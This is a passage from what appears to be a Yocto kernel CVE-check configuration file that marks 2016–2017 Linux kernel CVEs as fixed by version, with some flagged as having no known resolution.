1970CVE_CHECK_WHITELIST += "CVE-2016-6130"
1971
1972# fixed-version: Fixed after version 4.8rc1
1973CVE_CHECK_WHITELIST += "CVE-2016-6136"
1974
1975# fixed-version: Fixed after version 4.7rc7
1976CVE_CHECK_WHITELIST += "CVE-2016-6156"
1977
1978# fixed-version: Fixed after version 4.7
1979CVE_CHECK_WHITELIST += "CVE-2016-6162"
1980
1981# fixed-version: Fixed after version 4.7rc7
1982CVE_CHECK_WHITELIST += "CVE-2016-6187"
1983
1984# fixed-version: Fixed after version 4.6rc1
1985CVE_CHECK_WHITELIST += "CVE-2016-6197"
1986
1987# fixed-version: Fixed after version 4.6
1988CVE_CHECK_WHITELIST += "CVE-2016-6198"
1989
1990# fixed-version: Fixed after version 4.9rc1
1991CVE_CHECK_WHITELIST += "CVE-2016-6213"
1992
1993# fixed-version: Fixed after version 4.6rc1
1994CVE_CHECK_WHITELIST += "CVE-2016-6327"
1995
1996# fixed-version: Fixed after version 4.8rc3
1997CVE_CHECK_WHITELIST += "CVE-2016-6480"
1998
1999# fixed-version: Fixed after version 4.8rc1
2000CVE_CHECK_WHITELIST += "CVE-2016-6516"
2001
2002# Skipping CVE-2016-6753, no affected_versions
2003
2004# fixed-version: Fixed after version 4.0rc1
2005CVE_CHECK_WHITELIST += "CVE-2016-6786"
2006
2007# fixed-version: Fixed after version 4.0rc1
2008CVE_CHECK_WHITELIST += "CVE-2016-6787"
2009
2010# fixed-version: Fixed after version 4.8rc5
2011CVE_CHECK_WHITELIST += "CVE-2016-6828"
2012
2013# fixed-version: Fixed after version 4.9rc4
2014CVE_CHECK_WHITELIST += "CVE-2016-7039"
2015
2016# fixed-version: Fixed after version 4.9rc3
2017CVE_CHECK_WHITELIST += "CVE-2016-7042"
2018
2019# fixed-version: Fixed after version 4.9rc1
2020CVE_CHECK_WHITELIST += "CVE-2016-7097"
2021
2022# fixed-version: Fixed after version 4.6rc1
2023CVE_CHECK_WHITELIST += "CVE-2016-7117"
2024
2025# Skipping CVE-2016-7118, no affected_versions
2026
2027# fixed-version: Fixed after version 4.9rc1
2028CVE_CHECK_WHITELIST += "CVE-2016-7425"
2029
2030# fixed-version: Fixed after version 4.8rc1
2031CVE_CHECK_WHITELIST += "CVE-2016-7910"
2032
2033# fixed-version: Fixed after version 4.7rc7
2034CVE_CHECK_WHITELIST += "CVE-2016-7911"
2035
2036# fixed-version: Fixed after version 4.6rc5
2037CVE_CHECK_WHITELIST += "CVE-2016-7912"
2038
2039# fixed-version: Fixed after version 4.6rc1
2040CVE_CHECK_WHITELIST += "CVE-2016-7913"
2041
2042# fixed-version: Fixed after version 4.6rc4
2043CVE_CHECK_WHITELIST += "CVE-2016-7914"
2044
2045# fixed-version: Fixed after version 4.6rc1
2046CVE_CHECK_WHITELIST += "CVE-2016-7915"
2047
2048# fixed-version: Fixed after version 4.6rc7
2049CVE_CHECK_WHITELIST += "CVE-2016-7916"
2050
2051# fixed-version: Fixed after version 4.5rc6
2052CVE_CHECK_WHITELIST += "CVE-2016-7917"
2053
2054# fixed-version: Fixed after version 4.9
2055CVE_CHECK_WHITELIST += "CVE-2016-8399"
2056
2057# Skipping CVE-2016-8401, no affected_versions
2058
2059# Skipping CVE-2016-8402, no affected_versions
2060
2061# Skipping CVE-2016-8403, no affected_versions
2062
2063# Skipping CVE-2016-8404, no affected_versions
2064
2065# fixed-version: Fixed after version 4.10rc6
2066CVE_CHECK_WHITELIST += "CVE-2016-8405"
2067
2068# Skipping CVE-2016-8406, no affected_versions
2069
2070# Skipping CVE-2016-8407, no affected_versions
2071
2072# fixed-version: Fixed after version 4.9rc4
2073CVE_CHECK_WHITELIST += "CVE-2016-8630"
2074
2075# fixed-version: Fixed after version 4.9rc8
2076CVE_CHECK_WHITELIST += "CVE-2016-8632"
2077
2078# fixed-version: Fixed after version 4.9rc4
2079CVE_CHECK_WHITELIST += "CVE-2016-8633"
2080
2081# fixed-version: Fixed after version 4.10rc8
2082CVE_CHECK_WHITELIST += "CVE-2016-8636"
2083
2084# fixed-version: Fixed after version 4.9rc6
2085CVE_CHECK_WHITELIST += "CVE-2016-8645"
2086
2087# fixed-version: Fixed after version 4.4rc1
2088CVE_CHECK_WHITELIST += "CVE-2016-8646"
2089
2090# fixed-version: Fixed after version 4.9rc7
2091CVE_CHECK_WHITELIST += "CVE-2016-8650"
2092
2093# fixed-version: Fixed after version 4.9rc8
2094CVE_CHECK_WHITELIST += "CVE-2016-8655"
2095
2096# fixed-version: Fixed after version 4.8rc7
2097CVE_CHECK_WHITELIST += "CVE-2016-8658"
2098
2099# CVE-2016-8660 has no known resolution
2100
2101# fixed-version: Fixed after version 4.6rc1
2102CVE_CHECK_WHITELIST += "CVE-2016-8666"
2103
2104# fixed-version: Fixed after version 4.9rc4
2105CVE_CHECK_WHITELIST += "CVE-2016-9083"
2106
2107# fixed-version: Fixed after version 4.9rc4
2108CVE_CHECK_WHITELIST += "CVE-2016-9084"
2109
2110# fixed-version: Fixed after version 4.6rc1
2111CVE_CHECK_WHITELIST += "CVE-2016-9120"
2112
2113# fixed-version: Fixed after version 4.8rc7
2114CVE_CHECK_WHITELIST += "CVE-2016-9178"
2115
2116# fixed-version: Fixed after version 4.10rc4
2117CVE_CHECK_WHITELIST += "CVE-2016-9191"
2118
2119# fixed-version: Fixed after version 4.9rc3
2120CVE_CHECK_WHITELIST += "CVE-2016-9313"
2121
2122# fixed-version: Fixed after version 4.9rc4
2123CVE_CHECK_WHITELIST += "CVE-2016-9555"
2124
2125# fixed-version: Fixed after version 4.9
2126CVE_CHECK_WHITELIST += "CVE-2016-9576"
2127
2128# fixed-version: Fixed after version 4.10rc1
2129CVE_CHECK_WHITELIST += "CVE-2016-9588"
2130
2131# fixed-version: Fixed after version 4.11rc8
2132CVE_CHECK_WHITELIST += "CVE-2016-9604"
2133
2134# Skipping CVE-2016-9644, no affected_versions
2135
2136# fixed-version: Fixed after version 4.6rc1
2137CVE_CHECK_WHITELIST += "CVE-2016-9685"
2138
2139# fixed-version: Fixed after version 4.7rc1
2140CVE_CHECK_WHITELIST += "CVE-2016-9754"
2141
2142# fixed-version: Fixed after version 4.9rc8
2143CVE_CHECK_WHITELIST += "CVE-2016-9755"
2144
2145# fixed-version: Fixed after version 4.9rc7
2146CVE_CHECK_WHITELIST += "CVE-2016-9756"
2147
2148# fixed-version: Fixed after version 4.9rc7
2149CVE_CHECK_WHITELIST += "CVE-2016-9777"
2150
2151# fixed-version: Fixed after version 4.9rc8
2152CVE_CHECK_WHITELIST += "CVE-2016-9793"
2153
2154# fixed-version: Fixed after version 4.7rc1
2155CVE_CHECK_WHITELIST += "CVE-2016-9794"
2156
2157# fixed-version: Fixed after version 4.7rc1
2158CVE_CHECK_WHITELIST += "CVE-2016-9806"
2159
2160# fixed-version: Fixed after version 4.9rc8
2161CVE_CHECK_WHITELIST += "CVE-2016-9919"
2162
2163# Skipping CVE-2017-0403, no affected_versions
2164
2165# Skipping CVE-2017-0404, no affected_versions
2166
2167# Skipping CVE-2017-0426, no affected_versions
2168
2169# Skipping CVE-2017-0427, no affected_versions
2170
2171# CVE-2017-0507 has no known resolution
2172
2173# CVE-2017-0508 has no known resolution
2174
2175# Skipping CVE-2017-0510, no affected_versions
2176
2177# Skipping CVE-2017-0528, no affected_versions
2178
2179# Skipping CVE-2017-0537, no affected_versions
2180
2181# CVE-2017-0564 has no known resolution
2182
2183# fixed-version: Fixed after version 4.12rc1
2184CVE_CHECK_WHITELIST += "CVE-2017-0605"
2185
2186# fixed-version: Fixed after version 4.14rc1
2187CVE_CHECK_WHITELIST += "CVE-2017-0627"
2188
2189# CVE-2017-0630 has no known resolution
2190
2191# CVE-2017-0749 has no known resolution
2192
2193# fixed-version: Fixed after version 4.5rc1
2194CVE_CHECK_WHITELIST += "CVE-2017-0750"
2195
2196# fixed-version: Fixed after version 4.14rc4
2197CVE_CHECK_WHITELIST += "CVE-2017-0786"
2198
2199# fixed-version: Fixed after version 4.15rc3
2200CVE_CHECK_WHITELIST += "CVE-2017-0861"
2201
2202# fixed-version: Fixed after version 4.13rc5
2203CVE_CHECK_WHITELIST += "CVE-2017-1000"
2204
2205# fixed-version: Fixed after version 4.13rc5
2206CVE_CHECK_WHITELIST += "CVE-2017-1000111"
2207
2208# fixed-version: Fixed after version 4.13rc5
2209CVE_CHECK_WHITELIST += "CVE-2017-1000112"
2210
2211# fixed-version: Fixed after version 4.14rc1
2212CVE_CHECK_WHITELIST += "CVE-2017-1000251"
2213
2214# fixed-version: Fixed after version 4.14rc1
2215CVE_CHECK_WHITELIST += "CVE-2017-1000252"
2216
2217# fixed-version: Fixed after version 4.1rc1
2218CVE_CHECK_WHITELIST += "CVE-2017-1000253"
2219
2220# fixed-version: Fixed after version 4.14rc5
2221CVE_CHECK_WHITELIST += "CVE-2017-1000255"
2222
2223# fixed-version: Fixed after version 4.12rc2
2224CVE_CHECK_WHITELIST += "CVE-2017-1000363"
2225
2226# fixed-version: Fixed after version 4.12rc6
2227CVE_CHECK_WHITELIST += "CVE-2017-1000364"
2228
2229# fixed-version: Fixed after version 4.12rc7
2230CVE_CHECK_WHITELIST += "CVE-2017-1000365"
2231
2232# fixed-version: Fixed after version 4.13rc1
2233CVE_CHECK_WHITELIST += "CVE-2017-1000370"
2234
2235# fixed-version: Fixed after version 4.13rc1
2236CVE_CHECK_WHITELIST += "CVE-2017-1000371"
2237
2238# fixed-version: Fixed after version 4.12rc6
2239CVE_CHECK_WHITELIST += "CVE-2017-1000379"
2240
2241# fixed-version: Fixed after version 4.12rc5
2242CVE_CHECK_WHITELIST += "CVE-2017-1000380"
2243
2244# fixed-version: Fixed after version 4.15rc2
2245CVE_CHECK_WHITELIST += "CVE-2017-1000405"
2246
2247# fixed-version: Fixed after version 4.15rc3
2248CVE_CHECK_WHITELIST += "CVE-2017-1000407"
2249
2250# fixed-version: Fixed after version 4.15rc8
2251CVE_CHECK_WHITELIST += "CVE-2017-1000410"
2252
2253# fixed-version: Fixed after version 4.11rc1
2254CVE_CHECK_WHITELIST += "CVE-2017-10661"
2255
2256# fixed-version: Fixed after version 4.12rc1
2257CVE_CHECK_WHITELIST += "CVE-2017-10662"
2258
2259# fixed-version: Fixed after version 4.13rc1
2260CVE_CHECK_WHITELIST += "CVE-2017-10663"
2261
2262# fixed-version: Fixed after version 4.12rc1
2263CVE_CHECK_WHITELIST += "CVE-2017-10810"
2264
2265# fixed-version: Fixed after version 4.12rc7
2266CVE_CHECK_WHITELIST += "CVE-2017-10911"
2267
2268# fixed-version: Fixed after version 4.13rc1
2269CVE_CHECK_WHITELIST += "CVE-2017-11089"
2270
2271# fixed-version: Fixed after version 4.13rc1
2272CVE_CHECK_WHITELIST += "CVE-2017-11176"
2273
2274# fixed-version: Fixed after version 4.12rc1
2275CVE_CHECK_WHITELIST += "CVE-2017-11472"
2276
2277# fixed-version: Fixed after version 4.13rc2
2278CVE_CHECK_WHITELIST += "CVE-2017-11473"
2279
2280# fixed-version: Fixed after version 4.13
2281CVE_CHECK_WHITELIST += "CVE-2017-11600"
2282
2283# fixed-version: Fixed after version 4.13rc6
2284CVE_CHECK_WHITELIST += "CVE-2017-12134"
2285
2286# fixed-version: Fixed after version 4.13rc1
2287CVE_CHECK_WHITELIST += "CVE-2017-12146"
2288
2289# fixed-version: Fixed after version 4.14rc2
2290CVE_CHECK_WHITELIST += "CVE-2017-12153"
2291
2292# fixed-version: Fixed after version 4.14rc1
2293CVE_CHECK_WHITELIST += "CVE-2017-12154"
2294
2295# fixed-version: Fixed after version 4.9rc6
2296CVE_CHECK_WHITELIST += "CVE-2017-12168"
2297
2298# fixed-version: Fixed after version 4.14rc5
2299CVE_CHECK_WHITELIST += "CVE-2017-12188"
2300
2301# fixed-version: Fixed after version 4.14rc5
2302CVE_CHECK_WHITELIST += "CVE-2017-12190"
2303
2304# fixed-version: Fixed after version 4.14rc3
2305CVE_CHECK_WHITELIST += "CVE-2017-12192"
2306
2307# fixed-version: Fixed after version 4.14rc7
2308CVE_CHECK_WHITELIST += "CVE-2017-12193"
2309
2310# fixed-version: Fixed after version 4.13rc4
2311CVE_CHECK_WHITELIST += "CVE-2017-12762"
2312
2313# fixed-version: Fixed after version 4.14rc6
2314CVE_CHECK_WHITELIST += "CVE-2017-13080"
2315
2316# fixed-version: Fixed after version 4.16rc1
2317CVE_CHECK_WHITELIST += "CVE-2017-13166"
2318
2319# fixed-version: Fixed after version 4.5rc4
2320CVE_CHECK_WHITELIST += "CVE-2017-13167"
2321
2322# fixed-version: Fixed after version 4.18rc4
2323CVE_CHECK_WHITELIST += "CVE-2017-13168"
2324
2325# fixed-version: Fixed after version 4.5rc1
2326CVE_CHECK_WHITELIST += "CVE-2017-13215"
2327
2328# fixed-version: Fixed after version 4.15rc8
2329CVE_CHECK_WHITELIST += "CVE-2017-13216"
2330
2331# fixed-version: Fixed after version 3.19rc3
2332CVE_CHECK_WHITELIST += "CVE-2017-13220"
2333
2334# CVE-2017-13221 has no known resolution
2335
2336# CVE-2017-13222 has no known resolution
2337
2338# fixed-version: Fixed after version 4.12rc5
2339CVE_CHECK_WHITELIST += "CVE-2017-13305"
2340
2341# fixed-version: Fixed after version 4.13rc7
2342CVE_CHECK_WHITELIST += "CVE-2017-13686"
2343
2344# CVE-2017-13693 has no known resolution
2345
2346# CVE-2017-13694 has no known resolution
2347
2348# fixed-version: Fixed after version 4.17rc1
2349CVE_CHECK_WHITELIST += "CVE-2017-13695"
2350
2351# fixed-version: Fixed after version 4.3rc1
2352CVE_CHECK_WHITELIST += "CVE-2017-13715"
2353
2354# fixed-version: Fixed after version 4.14rc1
2355CVE_CHECK_WHITELIST += "CVE-2017-14051"
2356
2357# fixed-version: Fixed after version 4.12rc3
2358CVE_CHECK_WHITELIST += "CVE-2017-14106"
2359
2360# fixed-version: Fixed after version 4.13rc6
2361CVE_CHECK_WHITELIST += "CVE-2017-14140"
2362
2363# fixed-version: Fixed after version 4.14rc1
2364CVE_CHECK_WHITELIST += "CVE-2017-14156"
2365
2366# fixed-version: Fixed after version 4.14rc1
2367CVE_CHECK_WHITELIST += "CVE-2017-14340"
2368
2369# fixed-version: Fixed after version 4.14rc3
2370CVE_CHECK_WHITELIST += "CVE-2017-14489"
2371
2372# fixed-version: Fixed after version 4.13
2373CVE_CHECK_WHITELIST += "CVE-2017-14497"
2374
2375# fixed-version: Fixed after version 4.14rc3
2376CVE_CHECK_WHITELIST += "CVE-2017-14954"
2377
2378# fixed-version: Fixed after version 4.14rc2
2379CVE_CHECK_WHITELIST += "CVE-2017-14991"
2380
2381# fixed-version: Fixed after version 4.9rc1
2382CVE_CHECK_WHITELIST += "CVE-2017-15102"
2383
2384# fixed-version: Fixed after version 4.14rc6
2385CVE_CHECK_WHITELIST += "CVE-2017-15115"
2386
2387# fixed-version: Fixed after version 4.2rc1
2388CVE_CHECK_WHITELIST += "CVE-2017-15116"
2389
2390# fixed-version: Fixed after version 3.11rc1
2391CVE_CHECK_WHITELIST += "CVE-2017-15121"
2392
2393# fixed-version: Fixed after version 4.14rc4
2394CVE_CHECK_WHITELIST += "CVE-2017-15126"
2395
2396# fixed-version: Fixed after version 4.13rc5
2397CVE_CHECK_WHITELIST += "CVE-2017-15127"
2398
2399# fixed-version: Fixed after version 4.14rc8
2400CVE_CHECK_WHITELIST += "CVE-2017-15128"
2401
2402# fixed-version: Fixed after version 4.15rc5
2403CVE_CHECK_WHITELIST += "CVE-2017-15129"
2404
2405# fixed-version: Fixed after version 4.14rc5
2406CVE_CHECK_WHITELIST += "CVE-2017-15265"
2407
2408# fixed-version: Fixed after version 4.12rc5
2409CVE_CHECK_WHITELIST += "CVE-2017-15274"
2410
2411# fixed-version: Fixed after version 4.14rc6
2412CVE_CHECK_WHITELIST += "CVE-2017-15299"
2413
2414# fixed-version: Fixed after version 4.14rc7
2415CVE_CHECK_WHITELIST += "CVE-2017-15306"
2416
2417# fixed-version: Fixed after version 4.14rc3
2418CVE_CHECK_WHITELIST += "CVE-2017-15537"
2419
2420# fixed-version: Fixed after version 4.14rc4
2421CVE_CHECK_WHITELIST += "CVE-2017-15649"
2422
2423# fixed-version: Fixed after version 3.19rc3
2424CVE_CHECK_WHITELIST += "CVE-2017-15868"
2425
2426# fixed-version: Fixed after version 4.14rc6
2427CVE_CHECK_WHITELIST += "CVE-2017-15951"
2428
2429# fixed-version: Fixed after version 4.14rc5
2430CVE_CHECK_WHITELIST += "CVE-2017-16525"
2431
2432# fixed-version: Fixed after version 4.14rc4
2433CVE_CHECK_WHITELIST += "CVE-2017-16526"
2434
2435# fixed-version: Fixed after version 4.14rc5
2436CVE_CHECK_WHITELIST += "CVE-2017-16527"
2437
2438# fixed-version: Fixed after version 4.14rc1
2439CVE_CHECK_WHITELIST += "CVE-2017-16528"
2440
2441# fixed-version: Fixed after version 4.14rc4
2442CVE_CHECK_WHITELIST += "CVE-2017-16529"
2443
2444# fixed-version: Fixed after version 4.14rc4
2445CVE_CHECK_WHITELIST += "CVE-2017-16530"
2446
2447# fixed-version: Fixed after version 4.14rc4
2448CVE_CHECK_WHITELIST += "CVE-2017-16531"
2449
2450# fixed-version: Fixed after version 4.14rc5
2451CVE_CHECK_WHITELIST += "CVE-2017-16532"
2452
2453# fixed-version: Fixed after version 4.14rc5
2454CVE_CHECK_WHITELIST += "CVE-2017-16533"
2455
2456# fixed-version: Fixed after version 4.14rc4
2457CVE_CHECK_WHITELIST += "CVE-2017-16534"
2458
2459# fixed-version: Fixed after version 4.14rc6
2460CVE_CHECK_WHITELIST += "CVE-2017-16535"
2461
2462# fixed-version: Fixed after version 4.15rc1
2463CVE_CHECK_WHITELIST += "CVE-2017-16536"
2464
2465# fixed-version: Fixed after version 4.15rc1
2466CVE_CHECK_WHITELIST += "CVE-2017-16537"
2467
2468# fixed-version: Fixed after version 4.16rc1
2469CVE_CHECK_WHITELIST += "CVE-2017-16538"
2470
2471# fixed-version: Fixed after version 4.14rc7
2472CVE_CHECK_WHITELIST += "CVE-2017-16643"
2473
2474# fixed-version: Fixed after version 4.16rc1
2475CVE_CHECK_WHITELIST += "CVE-2017-16644"
2476
2477# fixed-version: Fixed after version 4.14rc6
2478CVE_CHECK_WHITELIST += "CVE-2017-16645"
2479
2480# fixed-version: Fixed after version 4.15rc1
2481CVE_CHECK_WHITELIST += "CVE-2017-16646"
2482
2483# fixed-version: Fixed after version 4.14
2484CVE_CHECK_WHITELIST += "CVE-2017-16647"
2485
2486# fixed-version: Fixed after version 4.15rc1
2487CVE_CHECK_WHITELIST += "CVE-2017-16648"
2488
2489# fixed-version: Fixed after version 4.14
2490CVE_CHECK_WHITELIST += "CVE-2017-16649"
2491
2492# fixed-version: Fixed after version 4.14
2493CVE_CHECK_WHITELIST += "CVE-2017-16650"
2494
2495# fixed-version: Fixed after version 4.15rc4
2496CVE_CHECK_WHITELIST += "CVE-2017-16911"
2497
2498# fixed-version: Fixed after version 4.15rc4
2499CVE_CHECK_WHITELIST += "CVE-2017-16912"
2500
2501# fixed-version: Fixed after version 4.15rc4
2502CVE_CHECK_WHITELIST += "CVE-2017-16913"
2503
2504# fixed-version: Fixed after version 4.15rc4
2505CVE_CHECK_WHITELIST += "CVE-2017-16914"
2506
2507# fixed-version: Fixed after version 4.14rc7
2508CVE_CHECK_WHITELIST += "CVE-2017-16939"
2509
2510# fixed-version: Fixed after version 4.15rc1
2511CVE_CHECK_WHITELIST += "CVE-2017-16994"
2512
2513# fixed-version: Fixed after version 4.15rc5
2514CVE_CHECK_WHITELIST += "CVE-2017-16995"
2515
2516# fixed-version: Fixed after version 4.15rc5
2517CVE_CHECK_WHITELIST += "CVE-2017-16996"
2518
2519# fixed-version: Fixed after version 4.13rc7
2520CVE_CHECK_WHITELIST += "CVE-2017-17052"
2521
2522# fixed-version: Fixed after version 4.13rc7
2523CVE_CHECK_WHITELIST += "CVE-2017-17053"
2524
2525# fixed-version: Fixed after version 4.15rc4
2526CVE_CHECK_WHITELIST += "CVE-2017-17448"
2527
2528# fixed-version: Fixed after version 4.15rc4
2529CVE_CHECK_WHITELIST += "CVE-2017-17449"
2530
2531# fixed-version: Fixed after version 4.15rc4
2532CVE_CHECK_WHITELIST += "CVE-2017-17450"
2533
2534# fixed-version: Fixed after version 4.15rc4
2535CVE_CHECK_WHITELIST += "CVE-2017-17558"
2536
2537# fixed-version: Fixed after version 4.15rc4
2538CVE_CHECK_WHITELIST += "CVE-2017-17712"
2539
2540# fixed-version: Fixed after version 4.15rc5
2541CVE_CHECK_WHITELIST += "CVE-2017-17741"
2542
2543# fixed-version: Fixed after version 4.15rc4
2544CVE_CHECK_WHITELIST += "CVE-2017-17805"
2545
2546# fixed-version: Fixed after version 4.15rc4
2547CVE_CHECK_WHITELIST += "CVE-2017-17806"
2548
2549# fixed-version: Fixed after version 4.15rc3
2550CVE_CHECK_WHITELIST += "CVE-2017-17807"
2551
2552# fixed-version: Fixed after version 4.15rc5
2553CVE_CHECK_WHITELIST += "CVE-2017-17852"
2554
2555# fixed-version: Fixed after version 4.15rc5
2556CVE_CHECK_WHITELIST += "CVE-2017-17853"
2557
2558# fixed-version: Fixed after version 4.15rc5
2559CVE_CHECK_WHITELIST += "CVE-2017-17854"
2560
2561# fixed-version: Fixed after version 4.15rc5
2562CVE_CHECK_WHITELIST += "CVE-2017-17855"
2563
2564# fixed-version: Fixed after version 4.15rc5
2565CVE_CHECK_WHITELIST += "CVE-2017-17856"
2566
2567# fixed-version: Fixed after version 4.15rc5
2568CVE_CHECK_WHITELIST += "CVE-2017-17857"
2569
2570# fixed-version: Fixed after version 4.15rc1
2571CVE_CHECK_WHITELIST += "CVE-2017-17862"
2572
2573# fixed-version: Fixed after version 4.15rc5
2574CVE_CHECK_WHITELIST += "CVE-2017-17863"
2575
2576# fixed-version: Fixed after version 4.15rc5
2577CVE_CHECK_WHITELIST += "CVE-2017-17864"
2578
2579# fixed-version: Fixed after version 4.17rc1
2580CVE_CHECK_WHITELIST += "CVE-2017-17975"
2581
2582# fixed-version: Fixed after version 4.11rc7
2583CVE_CHECK_WHITELIST += "CVE-2017-18017"
2584
2585# fixed-version: Fixed after version 4.15rc7
2586CVE_CHECK_WHITELIST += "CVE-2017-18075"
2587
2588# fixed-version: Fixed after version 4.13rc1
2589CVE_CHECK_WHITELIST += "CVE-2017-18079"
2590
2591# CVE-2017-18169 has no known resolution
2592
2593# fixed-version: Fixed after version 4.7rc1
2594CVE_CHECK_WHITELIST += "CVE-2017-18174"
2595
2596# fixed-version: Fixed after version 4.13rc1
2597CVE_CHECK_WHITELIST += "CVE-2017-18193"
2598
2599# fixed-version: Fixed after version 4.14rc5
2600CVE_CHECK_WHITELIST += "CVE-2017-18200"
2601
2602# fixed-version: Fixed after version 4.15rc2
2603CVE_CHECK_WHITELIST += "CVE-2017-18202"
2604
2605# fixed-version: Fixed after version 4.15rc1
2606CVE_CHECK_WHITELIST += "CVE-2017-18203"
2607
2608# fixed-version: Fixed after version 4.15rc1
2609CVE_CHECK_WHITELIST += "CVE-2017-18204"
2610
2611# fixed-version: Fixed after version 4.15rc2
2612CVE_CHECK_WHITELIST += "CVE-2017-18208"
2613
2614# fixed-version: Fixed after version 4.15rc1
2615CVE_CHECK_WHITELIST += "CVE-2017-18216"
2616
2617# fixed-version: Fixed after version 4.13rc1
2618CVE_CHECK_WHITELIST += "CVE-2017-18218"
2619
2620# fixed-version: Fixed after version 4.12rc4
2621CVE_CHECK_WHITELIST += "CVE-2017-18221"
2622
2623# fixed-version: Fixed after version 4.12rc1
2624CVE_CHECK_WHITELIST += "CVE-2017-18222"
2625
2626# fixed-version: Fixed after version 4.15rc1
2627CVE_CHECK_WHITELIST += "CVE-2017-18224"
2628
2629# fixed-version: Fixed after version 4.16rc1
2630CVE_CHECK_WHITELIST += "CVE-2017-18232"
2631
2632# fixed-version: Fixed after version 4.13rc1
2633CVE_CHECK_WHITELIST += "CVE-2017-18241"
2634
2635# fixed-version: Fixed after version 4.12rc1
2636CVE_CHECK_WHITELIST += "CVE-2017-18249"
2637
2638# fixed-version: Fixed after version 4.11rc1
2639CVE_CHECK_WHITELIST += "CVE-2017-18255"
2640
2641# fixed-version: Fixed after version 4.11rc1
2642CVE_CHECK_WHITELIST += "CVE-2017-18257"
2643
2644# fixed-version: Fixed after version 4.13rc6
2645CVE_CHECK_WHITELIST += "CVE-2017-18261"
2646
2647# fixed-version: Fixed after version 4.14rc3
2648CVE_CHECK_WHITELIST += "CVE-2017-18270"
2649
2650# fixed-version: Fixed after version 4.15rc4
2651CVE_CHECK_WHITELIST += "CVE-2017-18344"
2652
2653# fixed-version: Fixed after version 4.12rc2
2654CVE_CHECK_WHITELIST += "CVE-2017-18360"
2655
2656# fixed-version: Fixed after version 4.14rc3
2657CVE_CHECK_WHITELIST += "CVE-2017-18379"
2658
2659# fixed-version: Fixed after version 4.11rc1
2660CVE_CHECK_WHITELIST += "CVE-2017-18509"
2661
2662# fixed-version: Fixed after version 4.13rc1
2663CVE_CHECK_WHITELIST += "CVE-2017-18549"
2664
2665# fixed-version: Fixed after version 4.13rc1
2666CVE_CHECK_WHITELIST += "CVE-2017-18550"
2667
2668# fixed-version: Fixed after version 4.15rc9
2669CVE_CHECK_WHITELIST += "CVE-2017-18551"
2670
2671# fixed-version: Fixed after version 4.11rc1
2672CVE_CHECK_WHITELIST += "CVE-2017-18552"
2673
2674# fixed-version: Fixed after version 4.15rc6
2675CVE_CHECK_WHITELIST += "CVE-2017-18595"
2676
2677# fixed-version: Fixed after version 4.10rc4
2678CVE_CHECK_WHITELIST += "CVE-2017-2583"
2679
2680# fixed-version: Fixed after version 4.10rc4
2681CVE_CHECK_WHITELIST += "CVE-2017-2584"
2682
2683# fixed-version: Fixed after version 4.11rc1
2684CVE_CHECK_WHITELIST += "CVE-2017-2596"
2685
2686# fixed-version: Fixed after version 4.10rc8
2687CVE_CHECK_WHITELIST += "CVE-2017-2618"
2688
2689# fixed-version: Fixed after version 2.6.25rc1
2690CVE_CHECK_WHITELIST += "CVE-2017-2634"
2691
2692# fixed-version: Fixed after version 4.11rc2
2693CVE_CHECK_WHITELIST += "CVE-2017-2636"
2694
2695# fixed-version: Fixed after version 3.18rc1
2696CVE_CHECK_WHITELIST += "CVE-2017-2647"
2697
2698# fixed-version: Fixed after version 4.11rc6
2699CVE_CHECK_WHITELIST += "CVE-2017-2671"
2700
2701# fixed-version: Fixed after version 4.14rc5
2702CVE_CHECK_WHITELIST += "CVE-2017-5123"
2703
2704# fixed-version: Fixed after version 4.10rc4
2705CVE_CHECK_WHITELIST += "CVE-2017-5546"
2706
2707# fixed-version: Fixed after version 4.10rc5
2708CVE_CHECK_WHITELIST += "CVE-2017-5547"
2709
2710# fixed-version: Fixed after version 4.10rc5
2711CVE_CHECK_WHITELIST += "CVE-2017-5548"
2712
2713# fixed-version: Fixed after version 4.10rc4
2714CVE_CHECK_WHITELIST += "CVE-2017-5549"
2715
2716# fixed-version: Fixed after version 4.10rc4
2717CVE_CHECK_WHITELIST += "CVE-2017-5550"
2718
2719# fixed-version: Fixed after version 4.10rc4
2720CVE_CHECK_WHITELIST += "CVE-2017-5551"
2721
2722# fixed-version: Fixed after version 4.10rc6
2723CVE_CHECK_WHITELIST += "CVE-2017-5576"
2724
2725# fixed-version: Fixed after version 4.10rc6
2726CVE_CHECK_WHITELIST += "CVE-2017-5577"
2727
2728# fixed-version: Fixed after version 4.11rc1
2729CVE_CHECK_WHITELIST += "CVE-2017-5669"
2730
2731# fixed-version: Fixed after version 4.15rc8
2732CVE_CHECK_WHITELIST += "CVE-2017-5715"
2733
2734# fixed-version: Fixed after version 4.15rc8
2735CVE_CHECK_WHITELIST += "CVE-2017-5753"
2736
2737# fixed-version: Fixed after version 4.16rc1
2738CVE_CHECK_WHITELIST += "CVE-2017-5754"
2739
2740# fixed-version: Fixed after version 4.10rc8
2741CVE_CHECK_WHITELIST += "CVE-2017-5897"
2742
2743# fixed-version: Fixed after version 4.11rc1
2744CVE_CHECK_WHITELIST += "CVE-2017-5967"
2745
2746# fixed-version: Fixed after version 4.10rc8
2747CVE_CHECK_WHITELIST += "CVE-2017-5970"
2748
2749# fixed-version: Fixed after version 4.4rc1
2750CVE_CHECK_WHITELIST += "CVE-2017-5972"
2751
2752# fixed-version: Fixed after version 4.10rc8
2753CVE_CHECK_WHITELIST += "CVE-2017-5986"
2754
2755# fixed-version: Fixed after version 4.10rc4
2756CVE_CHECK_WHITELIST += "CVE-2017-6001"
2757
2758# fixed-version: Fixed after version 4.10
2759CVE_CHECK_WHITELIST += "CVE-2017-6074"
2760
2761# fixed-version: Fixed after version 4.10rc8
2762CVE_CHECK_WHITELIST += "CVE-2017-6214"
2763
2764# fixed-version: Fixed after version 4.10
2765CVE_CHECK_WHITELIST += "CVE-2017-6345"
2766
2767# fixed-version: Fixed after version 4.10
2768CVE_CHECK_WHITELIST += "CVE-2017-6346"
2769
2770# fixed-version: Fixed after version 4.11rc1
2771CVE_CHECK_WHITELIST += "CVE-2017-6347"
2772
2773# fixed-version: Fixed after version 4.10
2774CVE_CHECK_WHITELIST += "CVE-2017-6348"
2775
2776# fixed-version: Fixed after version 4.11rc1
2777CVE_CHECK_WHITELIST += "CVE-2017-6353"
2778
2779# fixed-version: Fixed after version 4.11rc2
2780CVE_CHECK_WHITELIST += "CVE-2017-6874"
2781
2782# fixed-version: Fixed after version 3.18rc1
2783CVE_CHECK_WHITELIST += "CVE-2017-6951"
2784
2785# fixed-version: Fixed after version 4.11rc5
2786CVE_CHECK_WHITELIST += "CVE-2017-7184"
2787
2788# fixed-version: Fixed after version 4.11rc5
2789CVE_CHECK_WHITELIST += "CVE-2017-7187"
2790
2791# fixed-version: Fixed after version 4.11rc6
